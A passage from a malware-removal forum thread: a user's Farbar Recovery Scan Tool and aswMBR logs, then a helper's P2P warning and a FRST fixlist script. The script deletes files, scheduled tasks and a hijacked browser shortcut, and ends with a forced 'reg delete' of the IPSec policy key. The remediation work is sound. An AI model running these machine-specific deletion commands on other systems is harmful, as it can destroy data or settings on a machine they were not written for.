    FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
    FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
    FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

    ==================== Restore Points =========================

    12-02-2016 19:34:43 Windows Update
    15-02-2016 13:41:32 Windows Backup
    18-02-2016 15:21:16 Windows Update
    21-02-2016 16:50:40 Windows Update
    21-02-2016 19:00:07 Windows Backup
    28-02-2016 19:00:09 Windows Backup

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:32:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:31:36 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
    Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
    Exception code: 0x80000003
    Fault offset: 0x0000000000151c4f
    Faulting process id: 0x6e4
    Faulting application start time: 0xSearchUI.exe0
    Faulting application path: SearchUI.exe1
    Faulting module path: SearchUI.exe2
    Report Id: SearchUI.exe3
    Faulting package full name: SearchUI.exe4
    Faulting package-relative application ID: SearchUI.exe5

    Error: (02/29/2016 08:30:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:30:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
    Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
    Exception code: 0x80000003
    Fault offset: 0x0000000000151c4f
    Faulting process id: 0xab4
    Faulting application start time: 0xSearchUI.exe0
    Faulting application path: SearchUI.exe1
    Faulting module path: SearchUI.exe2
    Report Id: SearchUI.exe3
    Faulting package full name: SearchUI.exe4
    Faulting package-relative application ID: SearchUI.exe5

    Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.


    System errors:
    =============
    Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Intel(R) Management and Security Application Local Management Service service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Intel(R) Dynamic Application Loader Host Interface Service service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
    Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
    %%1058

    Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The LogMeIn Hamachi Tunneling Engine service failed to start due to the following error:
    %%2

    Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
    Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

    Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
    Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}


    CodeIntegrity:
    ===================================
    Date: 2016-02-13 23:54:36.285
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.256
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.214
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.157
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.135
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.113
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.470
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.328
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.676
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.646
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
    Percentage of memory in use: 16%
    Total physical RAM: 16271.13 MB
    Available physical RAM: 13512.53 MB
    Total Virtual: 32655.13 MB
    Available Virtual: 29616.68 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:111.69 GB) (Free:13.97 GB) NTFS ==>[drive with boot components (obtained from BCD)]
    Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.93 GB) NTFS
    Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
    Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
    Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
    Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================

    aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
    Run date: 2016-02-29 20:47:33
    -----------------------------
    20:47:33.992 OS Version: Windows x64 6.2.9200
    20:47:33.992 Number of processors: 4 586 0x3C03
    20:47:33.992 ComputerName: KYM-PC UserName: Kym
    20:47:34.235 Initialize success
    20:47:34.242 VM: initialized successfully
    20:47:34.243 VM: Intel CPU supported virtualized
    20:47:43.424 VM: disk I/O iaStorA.sys
    20:47:45.547 AVAST engine defs: 16022900
    20:47:52.042 Disk 0 \Device\Harddisk0\DR0 -> \Device\0000002f
    20:47:52.043 Disk 0 Vendor: WDC_WD10EZRX-00A8LB0 01.01A01 Size: 953869MB BusType: 11
    20:47:52.046 Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\00000030
    20:47:52.047 Disk 1 Vendor: Samsung_SSD_840_EVO_120GB EXT0BB6Q Size: 114473MB BusType: 11
    20:47:52.054 Disk 1 MBR read successfully
    20:47:52.056 Disk 1 MBR scan
    20:47:52.058 Disk 1 Windows 7 default MBR code
    20:47:52.060 Disk 1 Partition 1 80 (A) 07 HPFS/NTFS NTFS 114371 MB offset 206848
    20:47:52.066 Disk 1 scanning C:\WINDOWS\system32\drivers
    20:47:52.741 Service scanning
    20:47:55.885 Modules scanning
    20:47:55.904 Disk 1 trace - called modules:
    20:47:55.923 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys hal.dll iaStorA.sys
    20:47:55.931 1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xffffe0019a1e4060]
    20:47:55.936 3 CLASSPNP.SYS[fffff8004bcb46c5] -> nt!IofCallDriver -> [0xffffe00199b88970]
    20:47:55.942 5 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> [0xffffe00199b8e040]
    20:47:55.947 7 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> \Device\00000030[0xffffe00199b90060]
    20:47:56.102 AVAST engine scan C:\WINDOWS
    20:47:56.331 AVAST engine scan C:\WINDOWS\system32
    20:48:15.220 AVAST engine scan C:\WINDOWS\system32\drivers
    20:48:16.311 AVAST engine scan C:\Users\Kym
    20:49:36.627 AVAST engine scan C:\ProgramData
    20:49:55.722 Disk 1 statistics 3041260/0/0 @ 20.88 MB/s
    20:49:55.726 Scan finished successfully
    20:50:05.349 Disk 1 MBR has been saved successfully to "C:\Users\Kym\Desktop\MBR.dat"
    20:50:05.352 The log file has been saved successfully to "C:\Users\Kym\Desktop\aswMBR.txt"

  4. #4
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post Registry Backup

    I have also backed up my registry

  5. #5
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    P2P Warning

    ------------------------------
    I see you have peer-to-peer (P2P) file sharing software installed on your computer (uTorrent). I advise you avoid P2P file sharing programmes; they are a security risk which can make your computer susceptible to malware. File sharing networks are thoroughly infected and infested with malware - worms, backdoor Trojans, IRCBots, and rootkits propagate via P2P file sharing networks, gaming, and underground sites. Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans, and spyware. The best way to reduce the risk of infection is to avoid these types of web sites and not use P2P applications. Please read the following articles for more information.

    Your P2P software can be removed by following the instructions below.
    • Press the Windows Key + r on your keyboard at the same time. Type appwiz.cpl and click OK.
    • Search for the aforementioned programme(s), right-click and click Uninstall.

    If you choose not to, please refrain from using the programme(s) during this process.
    ~~~~~~~~~~~~~~~~~~~~~~~~~

    Please open Notepad (Start -> Run -> type notepad in the Open field -> OK). *Do not use WordPad* or any text editor other than Notepad, or the script will fail. Copy and paste the text inside the quote box below:
    To do this, highlight the contents of the box, right-click on it and select Copy.
    Paste this into the open Notepad window and save it to the Desktop as fixlist.txt.
    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
    It needs to be saved next to the "Farbar Recovery Scan Tool" (if asked to overwrite an existing one, please allow).





    start
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
    EmptyTemp:
    End
    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
